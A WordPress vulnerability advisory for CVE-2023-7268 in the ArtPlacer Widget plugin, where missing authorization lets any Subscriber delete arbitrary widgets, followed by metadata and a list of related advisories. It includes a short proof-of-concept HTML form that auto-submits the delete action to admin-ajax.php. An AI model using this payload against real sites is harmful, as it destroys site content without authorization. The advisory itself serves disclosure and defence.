ArtPlacer Widget < 2.21.2 – Subscriber+ Arbitrary Widget Deletion | CVE 2023-7268 | Plugin Vulnerabilities

Description

The plugin does not have authorisation check in place when deleting widgets, allowing ay authenticated users, such as subscriber, to delete arbitrary widgets

Proof of Concept

Make sure at least one widget is created and grab its ID.

Have a Subscriber or above open an HTML file containing the following:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST"> 
        <input type="text" name="action" value="artplacer_del">
        <input type="text" name="id" value="REPLACE_WITH_ID">
        <input type="submit" value="submit">
    </form>
</body>
```

Affects Plugins

artplacer-widget

Fixed in 2.21.2

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

9ac233dd-e00d-4aee-a41c-0de6e8aaefd7

Timeline

Publicly Published

2024-06-28 (about 1 year ago)

Added

2024-06-28 (about 1 year ago)

Last Updated

2024-06-28 (about 1 year ago)

Other

Published

Title

Published

2024-12-30

Title

Hestia Nginx Cache < 2.4.1 - Missing Authorization

Published

2025-12-12

Title

Postem Ipsum <= 3.0.1 - Missing Authorization to Authenticated (Subscriber+) Privilege Escalation in postem_ipsum_generate_users

Published

2024-12-12

Title

PixProof <= 2.0.1 - Missing Authorization

Published

2025-04-17

Title

JetElements For Elementor < 2.7.4.2 - Missing Authorization

Published

2023-03-28

Title

Elementor Pro < 3.11.7 - Subscriber+ Arbitrary Options Update